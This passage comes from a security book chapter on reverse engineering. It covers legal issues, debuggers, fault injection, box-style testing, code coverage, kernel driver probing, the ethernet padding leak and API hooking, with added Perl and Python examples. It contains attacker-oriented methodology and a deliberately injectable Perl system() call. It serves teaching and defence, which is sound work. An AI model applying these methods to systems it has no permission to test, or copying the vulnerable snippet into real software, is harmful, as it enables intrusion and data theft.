Another reason that software vendors would like to see reverse engineering made illegal is to prevent researchers from finding security flaws in their code. Quite often security researchers find flaws in software and report them in public forums like bugtraq. This makes software vendors look bad, hurts their image, and damages their reputation as upstanding software vendors. (It also tends to make software improve at the same time.) A well-established practice is for a security specialist to report a flaw to the vendor and give them a reasonable grace period to fix the bug before its existence is made public. Note that during this grace period the flaw still exists for more secretive security specialists (including bad guys) to exploit. If reverse engineering is made illegal, then researchers will be prevented from using a critical tool for evaluating the quality of code. Without the ability to examine the structure of software, users will be forced to take the vendor's word that the software is truly a quality product.[3] Keep in mind that no vendor is currently held financially liable for failures in its software. We can thus trust the vendor's word regarding quality as far as it impacts their bottom line (and no farther).

[3] Note that many consumers already know that they are being sold poor-quality software, but some consumers remain confused about how much quality can actually be attained in software.

The Digital Millennium Copyright Act (DMCA) explicitly (and controversially) addresses reverse engineering from the perspective of copyright infringement and software cracking. For an interesting view of how this law impacts individual liberty, check out Ed Felten's Web site at http://www.freedomtotinker.com.

When you purchase or install software, you are typically presented with an end-user license agreement (EULA) on a click-through screen. This is a legal agreement that you are asked to read and agree to. In many cases, simply physically opening a software package container, such as the box or the disk envelope, implies that you have agreed to the software license. When you download software on-line, you are typically asked to press "I AGREE" in response to a EULA document displayed on the Web site (we won't get into the security ramifications of this). These agreements usually contain language that strictly prohibits reverse engineering. However, these agreements may or may not hold up in court [Kaner and Pels, 1998].


The Uniform Computer Information Transactions Act (UCITA) poses strong restrictions on reverse engineering and may be used to help "click through" EULAs stand up in court. Some states have adopted the UCITA (Maryland and Virginia as of this writing), which strongly affects your ability to reverse engineer legally.


Reverse Engineering Tools and Concepts

Reverse engineering fuels entire technical industries and paves the way for competition. Reverse engineers work on hard problems like integrating software with proprietary protocols and code. They also are often tasked with unraveling the mysteries of new products released by competitors. The boom in the 1980s of the PC clone market was heavily driven by the ability to reverse engineer the IBM PC BIOS software. The same tricks have been applied in the set-top game console industry (which includes the Sony PlayStation, for example). Chip manufacturers Cyrix and AMD have reverse engineered the Intel microprocessor to release compatible chips. From a legal perspective, reverse engineering work is dangerous because it skirts the edges of the law. New laws such as the DMCA and UCITA (which many security analysts decry as egregious) put heavy restrictions on reverse engineering. If you are tasked with reverse engineering software legally, you need to understand these laws. We are not going to dwell on the legal aspects of reverse engineering because we are not legal experts. Suffice it to say that it is very important to seek legal counsel on these matters, especially if you represent a company that cares about its intellectual property.

The Debugger

A debugger is a software program that attaches to and controls other software programs. A debugger allows single stepping of code, debug tracing, setting breakpoints, and viewing variables and memory state in the target program as it executes in a stepwise fashion. Debuggers are invaluable in determining logical program flow. Debuggers fall into two categories: user-mode and kernel-mode debuggers. User-mode debuggers run like normal programs under the OS and are subject to the same rules as normal programs. Thus, user-mode debuggers can only debug other user-level processes. A kernel-mode debugger is part of the OS and can debug device drivers and even the OS itself. One of the most popular commercial kernel-mode debuggers is called SoftIce and it is published by Compuware (http://www.compuware.com/products/driverstudio/ds/softice.htm).

Fault Injection Tools

Tools that can supply malformed or improperly formatted input to a target software process to cause failures are one class of fault injection tool. Program failures can be analyzed to determine whether errors exist in the target software. Some failures have security implications, such as failures that allow an attacker direct access to the host computer or network. Fault injection tools fall into two categories: host and network. Host-based fault injectors operate like debuggers and can attach to a process and alter program states. Network-based fault injectors manipulate network traffic to determine the effect on the receiver.

Although classic approaches to fault injection often make use of source code instrumentation [Voas and McGraw, 1999], some modern fault injectors pay more attention to tweaking program input. Of particular interest to security practitioners are Hailstorm (Cenzic), the Failure Simulation Tool or FST (Cigital), and Holodeck (Florida Tech). James Whittaker's approach to fault injection for testing (and breaking) software is explained in two books [Whittaker, 2002; Whittaker and Thompson, 2003].

The Disassembler

A disassembler is a tool that converts machine-readable code into assembly language. Assembly language is a human-readable form of machine code (well, more human readable than a string of bits anyway). Disassemblers reveal which machine instructions are being used in the code. Machine code is usually specific to a given hardware architecture (such as the PowerPC chip or Intel Pentium chip). Thus, disassemblers are written expressly for the target hardware architecture.

The Reverse Compiler or Decompiler

A decompiler is a tool that converts assembly code or machine code into source code in a higher level language such as C. Decompilers also exist to transform intermediate languages such as Java bytecode and Microsoft Common Runtime Language (CRL) into source code such as Java. These tools are extremely helpful in determining higher level logic such as loops, switches, and if-then statements. Decompilers are much like disassemblers but take the process one (important) step further. A good disassembler/compiler pair can be used to compile its own collective output back into the same binary.


Approaches to Reverse Engineering

As we said earlier, sometimes source code is available for a reverse engineer and sometimes it is not. White box and black box testing and analysis methods both attempt to understand the software, but they use different approaches depending on whether the analyst has access to source code.

Regardless of the method, there are several key areas that an attacker should examine to find vulnerabilities in software:

- Functions that do improper (or no) bounds checking
- Functions that pass through or consume user-supplied data in a format string
- Functions meant to enforce bounds checking in a format string (such as %20s)
- Routines that get user input using a loop
- Low-level byte copy operations
- Routines that use pointer arithmetic on user-supplied buffers
- "Trusted" system calls that take dynamic input

This somewhat tactical list is useful when you are "in the weeds" with binary code.

White Box Analysis

White box analysis involves analyzing and understanding source code. Sometimes only binary code is available, but if you decompile a binary to source code and then study the code, this can be considered a kind of white box analysis as well. White box testing is typically very effective in finding programming errors and implementation errors in software. In some cases this activity amounts to pattern matching and can even be automated with a static analyzer.[4] One drawback to this kind of white box testing is that it may report a potential vulnerability where none actually exists (called a false positive). Nevertheless, using static analysis methods on source code is a good approach to exploiting some kinds of software.

[4] Cigital's tool SourceScope, for example, can be used to find potential security flaws in a piece of software given its source code (http://www.cigital.com).

There are two types of white box analysis tools, those that require source code and those that automatically decompile the binary code and continue from there. One powerful and commercially available white box analysis platform, called IDA-Pro, does not require source code access. SourceScope, which includes an extensive database of source code-related problems and issues commonly encountered in Java, C, and C++, does require source code. The knowledge encapsulated in these tools is extremely useful in security analysis (and, of course, in exploiting software).

Black Box Analysis

Black box analysis refers to analyzing a running program by probing it with various inputs. This kind of testing requires only a running program and does not make use of source code analysis of any kind. In the security paradigm, malicious input can be supplied to the program in an effort to cause it to break. If the program does break during a particular test, then a security problem may have been discovered. Note that black box testing is possible even without access to binary code. That is, a program can be tested remotely over a network. All that is required is a program running somewhere that is accepting input. If the tester can supply input that the program consumes (and can observe the effect of the test), then black box testing is possible. This is one reason that real attackers often resort to black box techniques.

Black box testing is not as effective as white box testing in obtaining knowledge of the code and its behavior, but black box testing is much easier to accomplish and usually requires much less expertise than white box testing. During black box testing, an analyst attempts to evaluate as many meaningful internal code paths as can be directly influenced and observed from outside the system. Black box testing cannot exhaustively search a real program's input space for problems because of theoretical constraints, but a black box test does act more like an actual attack on target software in a real operational environment than a white box test usually can.

Because black box testing happens on a live system, it is often an effective way of understanding and evaluating denial-of-service problems. And because black box testing can validate an application within its runtime environment (if possible), it can be used to determine whether a potential problem area is actually vulnerable in a real production system.[5] Sometimes problems that are discovered in a white box analysis may not be exploitable in a real, deployed system. A firewall may block the attack, for example.[6]

[5] The problem with testing live production systems should be obvious. A successful denial-of-service test will take down a production system just as effectively as a real attack. Companies are not very receptive to this sort of testing, in our experience.

[6] However, note that white box analysis is useful for testing how a piece of software will behave across multiple environments. For code that is widely deployed, this kind of testing is essential.

Cenzic's Hailstorm is a commercially available black box testing platform for networked software. It can be used to probe live systems for security problems. For testing network routers and switches, special hardware devices are available, such as SmartBits and IXIA. A freeware tool called ISICS can be used to probe TCP/IP stack integrity. Protocol attack systems that use black box techniques include PROTOS and Spike.

Gray Box Analysis

Gray box analysis combines white box techniques with black box input testing. Gray box approaches usually require using several tools together. A good example of a simple gray box analysis is running a target program within a debugger and then supplying particular sets of inputs to the program. In this way, the program is exercised while the debugger is used to detect any failures or faulty behavior. Rational's Purify is a commercial tool that can provide detailed runtime analysis focused on memory use and consumption. This is particularly important for C and C++ programs (in which memory problems are rampant). A freeware debugger that provides runtime analysis for Linux is called Valgrind.

All testing methods can reveal possible software risks and potential exploits. White box analysis directly identifies more bugs, but the actual risk of exploit is hard to measure. Black box analysis identifies real problems that are known to be exploitable. The use of gray box techniques combines both methods in a powerful way. Black box tests can scan programs across networks. White box tests require source code or binaries to analyze statically. In a typical case, white box analysis is used to find potential problem areas, and black box testing is then used to develop working attacks against these areas.

Black Box                                    White Box
Audit software runtime environment           Audit software code
External threats                             Programming errors
Denial of service                            Central code repository required
Cascade failure                              Valuable to developers and testers
Security policy and filters
Scales and runs across enterprise network
Valuable to security/systems administrators

One problem with almost all kinds of security testing (regardless of whether such testing is black box or white box) is that there really isn't any. That is, most QA organizations concern themselves with functional testing and spend very little time understanding or probing for security risks. The QA process is almost always broken in most commercial software houses anyway because of time and budget constraints and the belief that QA is not an essential part of software development.

As software becomes more important, more emphasis is being placed on software quality management—a unified approach to testing and analysis that encompasses security, reliability, and performance. Software quality management uses both white box and black box techniques to identify and manage software risks as early as possible in the software development life cycle.

Using Gray Box Techniques to Find Vulnerabilities in Microsoft SQL Server 7

Gray box techniques usually leverage several tools. We provide an example using runtime debugging tools combined with a black box input generator. Using runtime error detection and debugging tools is a powerful way of finding problem software. When combined with black box injection tools, debuggers help catch software faults. In many cases, disassembly of the program can determine the exact nature of a software bug like the one we will show you.

One very powerful tool that examines software dynamically as it runs is Rational's Purify. In this example, black box injection was performed against Microsoft's SQL Server 7 using Hailstorm, while monitoring the target instrumented under Purify. By combining Purify and Hailstorm, the test is able to uncover a memory corruption problem occurring in the SQL server as a result of malformed protocol input. The corruption results in a software exception and subsequent failure.

To start, a remote input point is identified in the SQL server. The server listens for connections on TCP port 1433. The protocol used over this port is undocumented for the most part. Instead of reverse engineering the protocol, a simple test is constructed that supplies random inputs interspersed with numerical sequences. These data are played against the TCP port. The result is the generation of many possible "quasilegal" inputs to the port, which thus covers a wide range of input values. The inputs are injected for several minutes at a rate of around 20 per second. The data injected pass through a number of different code paths inside the SQL server software. These locations, in essence, read the protocol header. After a short time, the test causes a fault, and Purify notes that memory corruption has occurred. The screen shot in Figure 3-2 illustrates the SQL server failure, the Purify dump, and the Hailstorm testing platform all in one place. The memory corruption noted by Purify occurs before the SQL server crashes. Although the attack does result in a server crash, the point of memory corruption would be hard to determine without the use of Purify. The data supplied by Purify allow us to locate the exact code path that failed.

Figure 3-2. Screen shots of Hailstorm and Purify being used to probe the SQL server software for security problems using a black box paradigm.

The detection of this failure occurs well before an actual exploit has occurred. If we wanted to find this exploit using only black box tools, we might spend days trying input tests before this bug is exercised. The corruption that is occurring might cause a crash in an entirely different code location, making it very hard to identify which input sequence causes the error. Static analysis might have detected a memory corruption problem, but it would never be able to determine whether the bug could be exploited in practice by an attacker. By combining both technologies as we do in this example, we save time and get the best of both worlds.

Methods of the Reverser

There are several methods that can be used while reverse engineering software. Each has benefits and each has resource and time requirements. A typical approach uses a mixture of methods when decompiling and examining software. The best method mix depends entirely on your goals. For example, you may first want to run a quick scan of the code for obvious vulnerabilities. Next, you may want to perform a detailed input trace on the user-supplied data. You may not have time to trace each and every path, so you may use complex breakpoints and other tools to speed up the process. What follows is a brief description of several basic methods.

Tracing Input

Input tracing is the most thorough of all methods. First you identify the input points in the code. Input points are places where user-supplied data are being delivered to the program. For example, a call to WSARecvFrom() will retrieve a network packet. This call, in essence, accepts user-supplied data from the network and places it in a buffer. You can set a breakpoint on the input point and single-step trace into the program. Of course, your debugging tools should always include a pencil and paper. You must note each twist and turn in the code path. This approach is very tedious, but it is also very comprehensive.

Although determining all input points takes a great deal of time if you do it by hand, you have the opportunity to note every single code location that makes decisions based on user-supplied data. Using this method you can find very complex problems.

One language that protects against this kind of "look through the inputs" attack is Perl. Perl has a special security mode called taint mode. Taint mode uses a combination of static and dynamic checks to monitor all information that comes from outside a program (such as user input, program arguments, and environment variables) and issues warnings when the program attempts to do something potentially dangerous with that untrusted information. Consider the following script:

#!/usr/bin/perl -T
$username = <STDIN>;
chop $username;
system ("cat /usr/stats/$username");

On executing this script, Perl enters taint mode because of the -T option passed in the invocation line at the top. Perl then tries to compile the program. Taint mode will notice that the programmer has not explicitly initialized the PATH variable, yet tries to invoke a program using the shell anyway, which can easily be exploited. It issues an error such as the following before aborting compilation:



Insecure $ENV{PATH} while running with -T switch at ./catform.pl line 4, chunk 1.

We can modify the script to set the program's path explicitly to some safe value at startup:

#!/usr/bin/perl -T
use strict;
$ENV{PATH} = join ':', split (" ", <<__EOPATH__);
/usr/bin
/bin
__EOPATH__
my $username = <STDIN>;
chop $username;
system ("cat /usr/stats/$username");

Taint mode now determines that the $username variable is externally controlled and is not to be trusted. It determines that, because $username may be poisoned, the call to system may be poisoned. It thus gives another error:

Insecure dependency in system while running with -T switch at ./catform.pl line 9, chunk 1.

Even if we were to copy $username into another variable, taint mode would still catch the problem.


In the previous example, taint mode complains because the variable can use shell magic to cause a command to run. But taint mode does not address every possible input vulnerability, so a clever attacker using our input-driven method can still win.
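A completed version of catform.pl, added here as an example rather than the book's own code: it clears the taint on $username through a regex capture (the only way Perl sanctions) and drops the shell from the system() call, assuming the same /usr/stats directory layout as the book's script.

```perl
#!/usr/bin/perl -T
# Added example, not the book's code: catform.pl completed with explicit
# untainting. Under -T the only sanctioned way to clear the taint on a value
# is to pull it out of a regular-expression capture, which forces the
# programmer to state exactly what a valid username looks like.
use strict;
use warnings;

# Fix the PATH up front, as the book's second version of the script does.
# Taint mode also refuses to run external programs while these are set.
$ENV{PATH} = '/usr/bin:/bin';
delete @ENV{qw(IFS CDPATH ENV BASH_ENV)};

# The value read from STDIN is tainted because it came from outside the program.
my $raw = <STDIN>;
defined $raw or die "no input\n";
chomp $raw;

# Untaint by whitelist: letters, digits, underscore and hyphen only, at most
# 32 characters, and not starting with a hyphen so it cannot be read as an
# option by the program we run. Anything else is rejected, never "cleaned up".
# Because '/' and '.' are excluded, the value cannot escape /usr/stats either.
my ($username) = $raw =~ /\A([A-Za-z0-9_][A-Za-z0-9_-]{0,31})\z/
    or die "invalid username\n";

# Use the list form of system() so no shell is involved: metacharacters in the
# argument would be passed literally to cat rather than interpreted.
# /usr/stats is the directory layout assumed by the book's script.
system('cat', "/usr/stats/$username") == 0
    or die "cat failed: $?\n";
```

Run it as `perl -T catform.pl` so the switch on the command line matches the one on the shebang line; otherwise Perl stops with "Too late for -T".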

Advanced dataflow analysis is also useful to help protect against our attack method (or to help carry it out). Static analysis tools can help an analyst (or an attacker) identify all possible input points and to determine which variables are affected from the outside. The security research literature is filled with references discussing "secure information flow" that take advantage of data flow analysis to determine program safety.

Exploiting Version Differences

When you study a system to find weaknesses, remember the software vendor fixes many bugs in each version release. In some cases the vendor may supply a "hot fix" or a patch that updates the system binaries. It is extremely important to watch the differences between software versions.

The differences between versions are, in essence, attack maps. If a new version of the software or protocol specification is available, then weaknesses or bugs will most certainly have been fixed (if they have been discovered). Even if the "bug fix" list is not published, you can compare the binary files of the older version against the new one. Differences can be uncovered where features have been added or bugs have been fixed. These differences thereby reveal important hints regarding where to look for vulnerabilities.

Making Use of Code Coverage

Cracking a computer system is a scientific process just as much as it is an art. In fact, wielding the scientific method gives the attacker an upper hand in an otherwise arbitrary game. The scientific method starts with measurement. Without the ability to measure your environment, how can you possibly draw conclusions about it? Most of the approaches we consider in this text are designed to find programming flaws. Usually (not always), the bugs we find this way are confined to small regions of code. In other words, it's usually the small coding mistakes that we are after. This is one reason that new development tools are very likely to hamper many of the traditional methods of attack. It's easy for a development tool to identify a simple programming error (statically) and compile it out. In a few years, buffer overflows will be obsolete as an attack method.

All the techniques we describe are a form of measurement. We observe the behavior of the program while it is exercised in some way (for example, placed under stress). Strange behavior usually indicates unstable code. Unstable code has a high probability of security weaknesses. Measurement is the key. Code coverage is an important type of measurement—perhaps the most important.
Code coverage is a way of watching a program execute and determining which code paths have been exercised. Many tools are available for code coverage analysis. Code coverage tools do not always require source code. Some tools can attach to a process and gather measurements in real time. For one example, check out the University of Maryland's tool dyninstAPI (created by Jeff Hollingsworth).[7]

[7] The dyninstAPI tool can be found at http://www.dyninst.org/.

As an attacker, code coverage tells you how much work is left to do when you're surveying the landscape. By using coverage analysis you can immediately learn what you have missed. Computer programs are complex, and cracking them is tedious business. It's human nature to skip parts of the code and take shortcuts. Code coverage can show you whether you have missed something. If you skipped that subroutine because it looked harmless, well, think again! Code coverage can help you go back and check your work, walking down those dark alleys you missed the first time.

If you are trying to crack software, you most likely start with the user input point. As an example, consider a call to WSARecv().[8] Using outside-in tracing, you can measure the code paths that are visited. Many decisions are made by the code after user input is accepted. These decisions are implemented as branching statements, such as the conditional branch statements JNZ and JE, in x86 machine code. A code coverage tool can detect when a branch is about to occur and can build a map of each continuous block of machine code. What this means is that you, as the attacker, can instantly determine which code paths you have not exercised during your analysis.

[8] The WSARecv function receives data from a connected socket. See http://msdn.microsoft.com/library/default.asp?url=/library/en-us/winsock/winsock/wsarecv_2.asp.
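The measurement the text describes, shown on source lines instead of machine-code blocks, as an added example that is not from the book and is not the coverage tool the chapter builds later: a toy request handler (standing in for the code behind a receive call) is run under a batch of constructed inputs, the lines that executed are recorded, and the lines never exercised are reported so the analyst can see what a first pass missed. The handler, its inputs and the LineCoverage class are all constructed for this example.

```python
"""Line coverage for a toy request handler (added example, not the book's tool).

LineCoverage runs the handler under a batch of inputs, records the lines that
executed, and reports the ones never exercised: the "what have I missed?"
measurement the text describes. Everything here is constructed.
"""
import dis
import inspect
import sys


def handle_request(data: bytes) -> str:
    """Constructed handler with several branches after the input point."""
    if len(data) < 4:
        return "short"
    opcode = data[0]
    if opcode == 0x01:
        name = data[1:].split(b"\x00", 1)[0]
        if len(name) > 8:
            return "name-too-long"
        return "hello:" + name.decode("ascii", "replace")
    if opcode == 0x02:
        length = data[1]
        if length > len(data) - 2:
            return "bad-length"  # only reached by a malformed length field
        return "echo:" + data[2:2 + length].hex()
    return "unknown-opcode"


class LineCoverage:
    """Records which source lines of one target function execute."""

    def __init__(self, target):
        self.target = target
        self.code = target.__code__
        # Lines that carry bytecode, excluding the def line itself.
        self.all_lines = {
            ln for _, ln in dis.findlinestarts(self.code)
            if ln is not None and ln != self.code.co_firstlineno
        }
        self.hit = set()

    def _trace(self, frame, event, arg):
        # Trace only frames of the target; every other frame is left alone.
        if frame.f_code is not self.code:
            return None
        if event == "line":
            self.hit.add(frame.f_lineno)
        return self._trace

    def run(self, inputs):
        """Run the target on each input under tracing; coverage accumulates."""
        results = []
        sys.settrace(self._trace)
        try:
            for data in inputs:
                results.append(self.target(data))
        finally:
            sys.settrace(None)
        return results

    def unexercised(self):
        """Line numbers that carry bytecode but never executed."""
        return sorted(self.all_lines - self.hit)

    def unexercised_source(self):
        """Source text of the unexercised lines, for a readable report."""
        src, start = inspect.getsourcelines(self.target)
        return [src[ln - start].strip() for ln in self.unexercised()]

    def percent(self):
        return 100.0 * len(self.hit & self.all_lines) / len(self.all_lines)


# Constructed first batch: every opcode is tried, but no malformed length field.
FIRST_PASS = [b"ab", b"\x01bob\x00", b"\x01averyverylongname\x00",
              b"\x02\x02\xaa\xbb", b"\x09xxxx"]
# Constructed follow-up input that reaches the branch the first pass missed.
SECOND_PASS = [b"\x02\x09\xaa\xbb"]

if __name__ == "__main__":
    cov = LineCoverage(handle_request)
    cov.run(FIRST_PASS)
    print("first pass: %.0f%% of lines, still unexercised:" % cov.percent())
    for text in cov.unexercised_source():
        print("   ", text)
    cov.run(SECOND_PASS)
    print("after second pass, unexercised:", cov.unexercised())
```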

Reverse engineers know that their work is long and tedious. Using code coverage gives the clever reverse engineer a map for tracking progress. Such tracking can keep you sane and can also keep you going when you otherwise might give up without exploring all opportunities.

Code coverage is such an important tool for your bag of tricks that later in the chapter we illustrate how you can build a code coverage tool from scratch. In our example we focus on the x86 assembly language and the Windows XP OS. Our experience leads us to believe that it will be hard for you to find the perfect code coverage tool for your exact needs. Many of the available tools, commercial or otherwise, lack attack-style features and data visualization methods that are important to the attacker.

Accessing the Kernel

Poor access controls on handles opened by drivers can expose a system to attack. If you find a device driver with an unprotected handle, you might be able to run IOCTL commands to the kernel driver. Depending on what the driver supports, you might be able to crash the machine or gain access to the kernel. Any input to the driver that includes memory addresses should be immediately tested by inserting NULL values. Another option is to insert addresses that map to kernel memory. If the driver doesn't perform sanity checking on the user-mode supplied values, kernel memory may get malformed. If the attack is very clever, global state in the kernel may be modified, altering access permissions.

Leaking Data in Shared Buffers

Sharing buffers is somewhat like sharing food. A restaurant (hopefully) maintains strict rules about where raw meat can be placed. A little raw juice in someone's cooked meal could lead to illness and a lawsuit. A typical program has many buffers. Programs tend to reuse the same buffers over and over, but the questions from our perspective are the following: Will they be cleaned? Are dirty data kept from clean data? Buffers are a great place to start looking for potential data leakage. Any buffer that is used for both public and private data has a potential to leak information. Attacks that cause state corruption and/or race conditions may be used to cause private data to leak into public data. Any use of a buffer without cleaning the data between uses leads to potential leaks.

Example: The Ethernet Scrubbing Problem

One of us (Hoglund) codiscovered a vulnerability a few years ago that affects potentially millions of ethernet cards worldwide.[9] Ethernet cards use standard chipsets to connect to the network. These chips are truly the "tires" of the Internet. The problem is that many of these chips are leaking data across packets.

[9] This vulnerability was later released independently as the "Etherleak vulnerability." Go to http://archives.neohapsis.com/archives/vulnwatch/2003-q1/0016.html for more information.

The problem exists because data are stored in a buffer on the ethernet microchip. The minimum amount of data that must be sent in an ethernet packet is 66 bytes. This is the minimum frame size. But, many packets that need to be transmitted are actually much smaller than 66 bytes. Examples include small ping packets and ARP requests. Thus, these small packets are padded with data to meet the minimum number of 66 bytes.

The problem? Many chips do not clean their buffers between packets. Thus, a small packet will be padded with whatever was left in the buffer from the last packet. This means that other people's packets are leaking into a potential attack packet. This attack is simple to exploit and the attack works over switched environments. An attacker can craft a volley of small packets that solicit a small packet as a reply. As the small reply packets arrive, the attacker looks at the padding data to see other people's packet data.

Of course, some data are lost in this attack, because the first part of every packet is overwritten with the legitimate data for the reply. So, the attacker will naturally want to craft as small a packet as possible to siphon the data stream. Ping packets work well for these purposes, and allow an attacker to sniff cleartext passwords and even parts of encryption keys. ARP packets are even smaller, but will not work as a remote attack. Using ARP packets, an attacker can get TCP ACK numbers from other sessions in the response. This aids in a standard TCP/IP hijacking attack.[10]

[10] See Firewalls and Internet Security [Cheswick et al., 2003] for more on TCP/IP hijacking.
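The shared-buffer leak of the previous section and the ethernet padding case can be modelled together. This added Python example (not from the book) simulates a transmit buffer that is reused without scrubbing beside one that zero-fills its padding, and includes the check a defender would run over frames captured from their own network: find where the protocol-defined data ends (from the IP total length or the fixed ARP body size) and flag padding that is not zero. The frames, MAC addresses, NIC classes and the MAX_FRAME value are constructed; MIN_FRAME is the 66-byte figure the text uses.

```python
"""Padding leak from a reused transmit buffer (added example, not from the book).

LeakyNic models a chip that copies each frame into one transmit buffer and pads
short frames out to the minimum size with whatever the buffer already held.
ScrubbingNic zero-fills the padding instead. stale_padding() is the defender's
check over a captured frame. All frames here are constructed.
"""
import struct

MIN_FRAME = 66         # minimum frame size used in the text
MAX_FRAME = 1514       # assumed transmit buffer size
ETH_HDR = 14
ETHERTYPE_IPV4 = 0x0800
ETHERTYPE_ARP = 0x0806
ARP_IPV4_LEN = 28      # fixed ARP body size for IPv4 over Ethernet


class LeakyNic:
    """Reuses one buffer and never clears it between frames."""

    def __init__(self):
        self.txbuf = bytearray(MAX_FRAME)

    def transmit(self, frame: bytes) -> bytes:
        if len(frame) > MAX_FRAME:
            raise ValueError("frame too large")
        self.txbuf[:len(frame)] = frame          # overwrite only the new bytes
        wire_len = max(len(frame), MIN_FRAME)
        return bytes(self.txbuf[:wire_len])      # the tail is stale data


class ScrubbingNic(LeakyNic):
    """Same buffer reuse, but the padding region is zeroed before sending."""

    def transmit(self, frame: bytes) -> bytes:
        if len(frame) > MAX_FRAME:
            raise ValueError("frame too large")
        self.txbuf[:len(frame)] = frame
        wire_len = max(len(frame), MIN_FRAME)
        self.txbuf[len(frame):wire_len] = bytes(wire_len - len(frame))  # scrub
        return bytes(self.txbuf[:wire_len])


def payload_end(frame: bytes) -> int:
    """Offset where the protocol-defined data ends; the rest is padding.
    Returns len(frame) when the frame type is not understood."""
    if len(frame) < ETH_HDR:
        return len(frame)
    ethertype = struct.unpack(">H", frame[12:14])[0]
    if ethertype == ETHERTYPE_IPV4 and len(frame) >= ETH_HDR + 4:
        total_length = struct.unpack(">H", frame[16:18])[0]
        return min(len(frame), ETH_HDR + total_length)
    if ethertype == ETHERTYPE_ARP:
        return min(len(frame), ETH_HDR + ARP_IPV4_LEN)
    return len(frame)


def stale_padding(frame: bytes) -> bytes:
    """Padding bytes of a captured frame if any of them is non-zero, else b''."""
    padding = frame[payload_end(frame):]
    return padding if any(padding) else b""


def eth_header(ethertype: int) -> bytes:
    # Constructed MACs: broadcast destination, locally administered source.
    return b"\xff" * 6 + bytes.fromhex("020000000001") + struct.pack(">H", ethertype)


def ipv4_frame(payload: bytes) -> bytes:
    # Minimal constructed IPv4 header: version/IHL, TOS, total length, rest zeroed.
    ip_hdr = bytes([0x45, 0x00]) + struct.pack(">H", 20 + len(payload)) + bytes(16)
    return eth_header(ETHERTYPE_IPV4) + ip_hdr + payload


# Constructed traffic: a cleartext login leaves the host, then a tiny ARP reply.
VICTIM_FRAME = ipv4_frame(b"USER alice\r\nPASS hunter2\r\nQUIT\r\n")   # 66 bytes
ARP_FRAME = eth_header(ETHERTYPE_ARP) + bytes(ARP_IPV4_LEN)           # 42 bytes


def leaked_after(nic_cls) -> bytes:
    """Send the login frame, then the ARP frame; return any stale padding."""
    nic = nic_cls()
    nic.transmit(VICTIM_FRAME)
    return stale_padding(nic.transmit(ARP_FRAME))


if __name__ == "__main__":
    print("leaky chip padding:    ", leaked_after(LeakyNic))
    print("scrubbing chip padding:", leaked_after(ScrubbingNic))
```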

Auditing for Access Requirement Screwups

Lack of planning or laziness on the part of software engineers often leads to programs that require administrator or root access to operate.[11] Many programs that were upgraded from older Windows environments to work on Win2K and Windows XP require full access to the system. This would be OK except that programs that operate this way tend to leave a lot of world-accessible files sitting around.

[11] To learn more about this common problem and how to avoid it, see Building Secure Software [Viega and McGraw, 2001].

Look for directories where user data files are being stored. Ask yourself, are these directories storing sensitive data as well? If so, is the directory permission weak? This applies to the NT registry and to database operations as well. If an attacker replaces a DLL or changes the settings for a program, the attacker might be able to elevate access and take over a system.

Under Windows NT, look for open calls that request or create resources with no access restrictions. Excessive access requirements lead to insecure file and object permissions.

Using Your API Resources

Many system calls are known to lead to potential vulnerabilities [Viega and McGraw, 2001]. One good method of attack when reversing is to look for known calls that are problematic (including, for example, the much maligned strcpy()). Fortunately, there are tools that can help.[12]

[12] Cigital maintains a database of static analysis rules pertaining to security. There are more than 550 entries for C and C++ alone. Static analysis tools use this information to uncover potential vulnerabilities in software (an approach that works as well for software exploit as it does for software improvement).

Figure 3-3 includes a screenshot that shows APISPY32 capturing all calls to strcpy on a target system. We used the APISPY32 tool to capture a series of lstrcpy calls from Microsoft SQL server. Not all calls to strcpy are going to be vulnerable to buffer overflow, but some will.

Figure 3-3. APISPY32 can be used to find lstrcpy() calls in the SQL server code. This screenshot shows the results of one query.

APISPY is very easy to set up. You can download the program from www.internals.com. You must make a special file called APISpy32.api and place it in the WINNT or WINDOWS directory. For this example, we use the following configuration file settings:

KERNEL32.DLL:lstrcpy(PSTR, PSTR)
KERNEL32.DLL:lstrcpyA(PSTR, PSTR)
KERNEL32.DLL:lstrcat(PSTR, PSTR)
KERNEL32.DLL:lstrcatA(PSTR, PSTR)
WSOCK32.DLL:recv
WS2_32.DLL:recv
ADVAPI32.DLL:SetSecurityDescriptorDACL(DWORD, DWORD, DWORD, DWORD)

This sets APISPY to look for some function calls that we are interested in. While testing, it is extremely useful to hook potentially vulnerable API calls, as well as any calls that take user input. In between the two comes your reverse engineering task. If you can determine that data from the input side reaches the vulnerable API call, you have found yourself a way in.


Writing Interactive Disassembler (IDA) Plugins

IDA is short for Interactive Disassembler (available from www.datarescue.com) and is one of the most popular reverse engineering tools for software. IDA supports plugin modules so customers can extend the functionality and automate tasks. For this book we created a simple IDA plugin that can scan through two binary files and compare them. The plugin will highlight any code regions that have changed. This can be used to compare a prepatch executable with a postpatch executable to determine which lines of code were fixed.

In many cases, software vendors will "secretly" fix security bugs. The tool we provide here can help an attacker find these secret patches. Be forewarned that this plugin can flag many locations that have not changed at all. If compiler options are changed or the padding between functions is altered, the plugin will return a nice set of false positives. Nonetheless, this is a great example to illustrate how to start writing IDA plugins.
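The version-comparison idea from Exploiting Version Differences and the false-positive problem just described can be shown together. This added Python example (not the book's plugin and not IDA SDK code) compares two constructed byte images standing in for a pre-patch and a post-patch binary: a naive byte-for-byte compare floods the result as soon as the padding between functions shifts, while a compare that splits each image at inter-function padding and matches function bodies by hash reports only the function whose code actually changed. The function bytes, the padding convention (runs of 0xCC or 0x90 at least PAD_MIN long) and all names are assumptions made for this example.

```python
"""Pre-patch vs post-patch image compare (added example, not the book's IDA plugin).

naive_diff compares byte for byte and shows the false-positive flood that
follows a change in padding between functions. function_diff splits each image
at inter-function padding and matches bodies by hash, so only the function that
really changed is reported. Assumptions: functions are separated by runs of
0xCC/0x90 (INT3/NOP) at least PAD_MIN long, and no function body contains such
a run. All images below are constructed stand-ins, not real compiler output.
"""
import hashlib
import re
from collections import Counter

PAD_MIN = 4
PAD_RUN = re.compile(rb"[\xcc\x90]{%d,}" % PAD_MIN)


def naive_diff(old: bytes, new: bytes):
    """Byte-for-byte compare. Returns (offset, length) runs where the images
    differ; a difference in length counts as differing bytes at the tail."""
    runs = []
    start = None
    limit = max(len(old), len(new))
    for i in range(limit + 1):
        differs = i < limit and (i >= len(old) or i >= len(new) or old[i] != new[i])
        if differs and start is None:
            start = i
        elif not differs and start is not None:
            runs.append((start, i - start))
            start = None
    return runs


def split_functions(image: bytes):
    """Split an image into (offset, body) chunks at runs of padding bytes."""
    chunks = []
    pos = 0
    for m in PAD_RUN.finditer(image):
        if m.start() > pos:
            chunks.append((pos, image[pos:m.start()]))
        pos = m.end()
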